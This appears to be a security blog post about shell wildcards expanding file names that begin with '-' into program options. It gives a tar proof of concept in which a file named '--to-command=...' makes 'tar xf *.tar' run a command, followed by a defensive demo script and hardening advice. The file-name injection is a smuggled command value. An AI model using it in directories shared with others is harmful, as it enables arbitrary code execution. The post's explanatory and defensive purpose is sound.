Mon Dec 9 15:18:33 EET 2019

Shell wildcards considered dangerous?

A remote variant of the same problem affected wu-ftpd in 2003:
https://www.debian.org/security/2003/dsa-377

Summary: for a trusted command PROGRAM, executing
PROGRAM *.EXT
may lead to arbitrary code execution, e.g. for
PROGRAM=tar and EXT=tar.

The main idea is that the wildcard expansion can supply program options:
a file whose name starts with "-" is expanded into the argument list and
parsed by PROGRAM as an option rather than as a file name.

Open problems:

Are popular programs other than tar vulnerable?

Since shell wildcard expansion is unlikely to change, should best practice
include not using a bare *.EXT in the shell?


Example exploit vector: running the program in a directory whose contents
are controlled by someone else (an untrusted directory).

PoC:
====
$ rm -rf /tmp/1 ; mkdir /tmp/1 ; cd /tmp/1 ; tar cf a.tar /etc/issue
$ : > --to-command="yes .tar"

# end of setup; the PoC itself:
$ tar xf *.tar

# output: .tar (repeated)
====
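The following script is an added example and is not part of the original post. It builds a throwaway directory (a constructed sample) containing an ordinary archive name and a name that looks like an option, shows what a bare *.EXT glob and a ./*.EXT glob each hand to a program, and includes a small audit check for option-looking names in a directory. The file name "--looks-like-an-option.tar" is an assumption chosen for the demo; no program is ever invoked on it.

```shell
#!/bin/sh
# Added example, not from the original post. Constructed sample directory;
# the decoy name "--looks-like-an-option.tar" is an assumption for the demo.

# Print each argument on its own line, exactly as a called program would
# receive it in argv.
show_args() {
    for a in "$@"; do
        printf '%s\n' "$a"
    done
}

# Count the arguments that start with '-', i.e. the words an option parser
# would treat as options rather than as file names.
count_option_like() {
    n=0
    for a in "$@"; do
        case $a in
            -*) n=$((n + 1)) ;;
        esac
    done
    printf '%s\n' "$n"
}

# Audit check: list the entries in directory $1 whose names begin with '-'.
# The pattern is anchored with "$dir"/ so the loop variable itself never
# starts with '-'.
list_option_like_names() {
    dir=$1
    for f in "$dir"/-*; do
        [ -e "$f" ] || continue
        printf '%s\n' "${f##*/}"
    done
}

# Create the constructed demo directory and print its path.
make_demo() {
    d=$(mktemp -d)
    : > "$d/a.tar"
    : > "$d/--looks-like-an-option.tar"
    printf '%s\n' "$d"
}

# Unsafe pattern from the post: PROGRAM *.EXT. The option-looking name is
# passed as a bare word.
naive_expansion() {
    ( cd "$1" && show_args *.tar )
}

# Hardened pattern: PROGRAM ./*.EXT. Every expanded word starts with "./",
# so none of them can be parsed as an option.
safe_expansion() {
    ( cd "$1" && show_args ./*.tar )
}

# Run the whole demonstration and clean up.
demo() {
    d=$(make_demo)
    printf 'bare glob hands the program:\n'; naive_expansion "$d"
    printf './ glob hands the program:\n';   safe_expansion "$d"
    printf 'option-like words in bare glob: %s\n' "$(cd "$d" && count_option_like *.tar)"
    printf 'audit of %s:\n' "$d"; list_option_like_names "$d"
    rm -rf "$d"
}

demo
```

For the tar case on this page the hardened form is either a single explicit archive (tar -xf ./a.tar) or a loop over ./*.tar that passes each name quoted to tar -xf. Using "--" to end option parsing also works for programs that honour it, but it only helps where the program's own parser does; the "./" prefix does not depend on the program at all, and the audit function is a cheap check to run before invoking anything in a directory you do not control.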

Posted by wild